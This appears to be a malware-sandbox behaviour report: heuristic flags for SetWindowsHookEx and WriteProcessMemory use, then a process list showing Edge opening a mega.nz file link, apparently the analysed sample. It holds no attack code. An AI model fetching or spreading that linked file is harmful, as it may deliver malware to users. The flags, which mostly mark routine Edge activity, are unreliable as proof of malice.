N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4940 wrote to memory of 1056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1056 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 1268 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 3960 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4940 wrote to memory of 4764 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/CUt1QDyR#n6vgudTHTYgM_mZuot-SW_zmhiqVQXzqt_2RFi4uTMM

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xe4,0x108,0x7ffb3f8746f8,0x7ffb3f874708,0x7ffb3f874718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2296 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2872 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4692 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=5268 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=audio --mojo-platform-channel-handle=5084 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=video_capture --mojo-platform-channel-handle=5812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6316 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x340 0x344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=6672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1

